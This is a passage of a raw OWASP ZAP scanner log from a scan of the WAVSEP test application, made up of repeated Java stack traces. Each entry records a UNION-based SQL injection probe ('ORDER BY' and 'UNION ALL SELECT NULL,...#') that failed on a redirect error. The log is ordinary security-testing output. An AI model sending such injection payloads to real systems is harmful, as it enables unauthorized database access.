org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922662 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 6099#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 6099# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922663 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922665 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922667 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922668 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922670 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922671 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922672 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922673 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922674 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922676 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922677 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922678 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') ORDER BY 5900#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') ORDER BY 5900# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 